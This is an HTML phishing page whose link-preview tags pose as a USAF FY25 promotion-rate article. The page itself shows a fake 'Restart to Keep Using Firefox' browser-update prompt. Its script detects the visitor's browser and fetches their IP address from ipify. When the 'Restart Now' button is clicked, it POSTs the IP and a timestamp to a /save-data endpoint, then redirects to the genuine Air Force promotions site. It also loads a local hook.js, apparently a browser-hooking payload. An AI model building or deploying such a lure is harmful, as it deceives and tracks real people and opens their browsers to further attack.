<!DOCTYPE html>
<html>
<head>
  <title>Restart Required</title>
  <meta property="og:type" content="website">
  <meta property="og:url" content="http://usafgraphics.com/">
  <meta property="og:title" content="USAF Promotion Rate Adjustments FY25">
  <meta property="og:description" content="The FY25 promotion rate adjustments by the United States Air Force (USAF) mark a strategic shift in personnel management.">
  <meta property="og:image" content="https://upload.wikimedia.org/wikipedia/commons/thumb/0/06/US_Air_Force_Logo_Solid_Colour.svg/2560px-US_Air_Force_Logo_Solid_Colour.svg.png">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="./hook.js"></script>
  <style>
    body {
      font-family: Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 90vh;
      background: white; /* Default background color */
      color: black; /* Default text color */
    }
    .message {
      margin-top: 50px;
      text-align: left;
    }
    p:first-of-type {
      margin-top: 30px;
    }
    .button {
      margin-top: 20px;
      padding: 10px 30px;
      background-color: #00d9ff;
      color: rgb(28, 27, 34);
      font-weight: 600;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      transition: background-color 0.3s;
      margin-left: auto;
      margin-right: 0px;
    }
    .button:hover {
      background-color: #0056b3;
    }
    .button-div {
      display: flex;
      justify-content: end;
    }
  </style>
</head>
<body>
  <div class="message">
    <h1 id="browserMessage">Restart to Keep Using Firefox</h1>
    <p>
      An update to Firefox started in the background. You'll need to restart
      to finish the update.
    </p>
    <p>
      Your windows and tabs will be quickly restored, but private ones will
      not.
    </p>
    <div class="button-div">
      <button class="button" onclick="saveData()">Restart Now</button>
    </div>
    <p id="clicked"></p>
  </div>

  <script>
    // Function to detect the user's browser
  function detectBrowser() {
    // Get user agent string
    var userAgent = navigator.userAgent;

    // Log the user agent string for debugging
    console.log("User Agent:", userAgent);

    // Check for known browser patterns in the user agent string
    if (userAgent.indexOf("Chrome") != -1) {
        return "Google Chrome";
    } else if (userAgent.indexOf("Firefox") != -1) {
        return "Mozilla Firefox";
    } else if ((userAgent.indexOf("Opera") || userAgent.indexOf('OPR')) != -1) {
        return "Opera";
    } else if (userAgent.indexOf("Edge") != -1) {
        return "Microsoft Edge";
    } else if (userAgent.indexOf("Safari") != -1) {
        return "Safari";
    } else {
        return "Unknown"; // If the browser is not recognized
    }
}
  
    // Execute the browser detection function when the page loads
    window.onload = function() {
        var colorScheme = detectColorScheme();
        // Update the body background and text color based on the detected color scheme
        if (colorScheme === 'dark') {
            document.body.style.background = '#1c1b22'; // Dark mode background color
            document.body.style.color = 'white'; // Dark mode text color
        }
        var browser = detectBrowser();
        // Update the message to include the detected browser name
        document.getElementById("browserMessage").innerHTML = "Restart to Keep Using " + browser;
        };

    /* Add "https://api.ipify.org?format=json" to 
    get the IP Address of user*/
    var ipAddress;
    $(document).ready(()=>{
        $.getJSON("https://api.ipify.org?format=json",
        function (data) {
          ipAddress = data.ip;
          console.log(data)
            //set data to be a variable that we can pass as data in the later function
        })
    });
    function saveData() {
    var currentDate = new Date().toLocaleString(); // Get current date and time
    var logEntry = "IP Address: " + ipAddress + ", Date and Time: " + currentDate;
    console.log(logEntry); // Log the IP address and date/time
    
    // Construct the data to be sent in the POST request
    var postData = 'data=' + encodeURIComponent(logEntry);
    
    // Make the POST request to save the data
    fetch('/save-data', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: postData
    })
    .then(response => response.text())
    .then(data => {
        console.log(data);
        // Redirect to the specified link after saving data
        window.location.href = "https://www.afpc.af.mil/Promotion/Enlisted-Promotions/";
    });
}
    
    // Detect whether the user is using light or dark mode
    function detectColorScheme() {
        // Check if the user prefers dark mode
        var darkMode = window.matchMedia('(prefers-color-scheme: dark)').matches;
        return darkMode ? 'dark' : 'light';
    }
  </script>
</body>
</html>
